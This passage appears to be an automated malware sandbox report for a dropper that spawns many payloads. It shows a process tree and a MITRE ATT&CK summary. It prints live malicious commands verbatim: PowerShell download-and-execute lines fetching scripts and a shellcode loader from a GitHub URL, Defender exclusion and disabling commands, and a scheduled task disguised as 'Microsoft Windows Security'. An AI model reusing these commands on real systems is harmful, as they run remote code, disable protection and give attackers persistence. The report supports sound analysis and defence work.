            cmdline: C:\Users\Admin\AppData\Local\Temp\601415316.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            PID: 2340
          [6] C:\Users\Admin\AppData\Local\Temp\2578611513.exe
              cmdline: C:\Users\Admin\AppData\Local\Temp\2578611513.exe
              - Suspicious use of NtCreateUserProcessOtherParentProcess
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
              PID: 5076
        [5] C:\Users\Admin\AppData\Local\Temp\97196632.exe
            cmdline: C:\Users\Admin\AppData\Local\Temp\97196632.exe
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            PID: 1880
    [3] C:\Users\Admin\AppData\Local\Temp\Files\installs.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\installs.exe"
        - Checks computer location settings
        - Executes dropped EXE
        - Adds Run key to start application
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        PID: 4072
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          - System Location Discovery: System Language Discovery
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID: 1756
      [4] C:\Users\Admin\AppData\Local\Temp\Files\installs.exe
          cmdline: C:\Users\Admin\AppData\Local\Temp\Files\installs.exe
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
          PID: 3760
    [3] C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\crypted.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - System Location Discovery: System Language Discovery
        - Suspicious use of AdjustPrivilegeToken
        PID: 3812
      [4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          - System Location Discovery: System Language Discovery
          PID: 2712
    [3] C:\Users\Admin\AppData\Local\Temp\Files\winn.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\winn.exe"
        - Suspicious use of NtCreateUserProcessOtherParentProcess
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 3204
      [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\winn.exe' -Force
          - Suspicious behavior: EnumeratesProcesses
          PID: 4288
    [3] C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"
        - Executes dropped EXE
        PID: 3532
      [4] C:\Users\Admin\AppData\Local\Temp\Edge.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\Edge.exe"
          - Executes dropped EXE
          PID: 1784
    [3] C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        PID: 1544
    [3] C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\cryyy.exe"
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Checks processor information in registry
        PID: 3636
    [3] C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
        - Executes dropped EXE
        PID: 1904
      [4] C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          PID: 2036
        [5] C:\Windows\system32\cmd.exe
            cmdline: C:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
            PID: 3188
          [6] C:\Windows\system32\mshta.exe
              cmdline: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
              - Checks computer location settings
              PID: 1272
            [7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"
                - Blocklisted process makes network request
                - Command and Scripting Interpreter: PowerShell
                - Suspicious behavior: EnumeratesProcesses
                PID: 4248
              [8] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tdgturfp\tdgturfp.cmdline"
                  PID: 2504
                [9] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF79A.tmp" "c:\Users\Admin\AppData\Local\Temp\tdgturfp\CSC4F051FBCE1C54DEAABD2B684632A4B7.TMP"
                    PID: 2624
              [8] C:\Windows\system32\attrib.exe
                  cmdline: "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D}
                  - Views/modifies file attributes
                  PID: 3852
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1'))
                  - Blocklisted process makes network request
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of SetWindowsHookEx
                  PID: 1800
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                    - Command and Scripting Interpreter: PowerShell
                    - Suspicious behavior: EnumeratesProcesses
                    PID: 4504
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                    - Command and Scripting Interpreter: PowerShell
                    PID: 4048
              [8] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr
                  cmdline: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S
                  - Executes dropped EXE
                  PID: 2416
                [9] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr
                    cmdline: "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr" /S
                    - Executes dropped EXE
                    - Loads dropped DLL
                    PID: 3128
                  [10] C:\Windows\system32\cmd.exe
                       cmdline: C:\Windows\system32\cmd.exe /c mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)
                       PID: 2228
-
C:\Windows\system32\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close)11⤵
- Checks computer location settings
PID:1584 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex"12⤵
- Command and Scripting Interpreter: PowerShell
PID:3764 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'"10⤵PID:2280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Updated.scr'11⤵
- Command and Scripting Interpreter: PowerShell
PID:2428 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"10⤵PID:1796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend11⤵
- Command and Scripting Interpreter: PowerShell
PID:2612 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"10⤵PID:3596
-
C:\Windows\system32\tasklist.exetasklist /FO LIST11⤵
- Enumerates processes with tasklist
PID:2220 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"10⤵PID:1160
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid11⤵PID:1472
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'"5⤵PID:2700
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1740 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"5⤵PID:4728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵PID:1012
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
PID:760 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵PID:4696
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵PID:3604
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316 -
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"2⤵PID:4952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3656 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:2652
-
C:\Windows\System32\dwm.exeC:\Windows\System32\dwm.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4896 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:4720
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:3812
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:4216
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:2400
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:1844
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:1776
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:2796
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:1084
-
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5008
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- System Services (1)
  - Service Execution (1)
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
Defense Evasion
- Hide Artifacts (1)
  - Hidden Files and Directories (1)
- Impair Defenses (3)
  - Disable or Modify Tools (2)
- Indicator Removal (1)
  - File Deletion (1)
- Modify Registry (4)
Downloads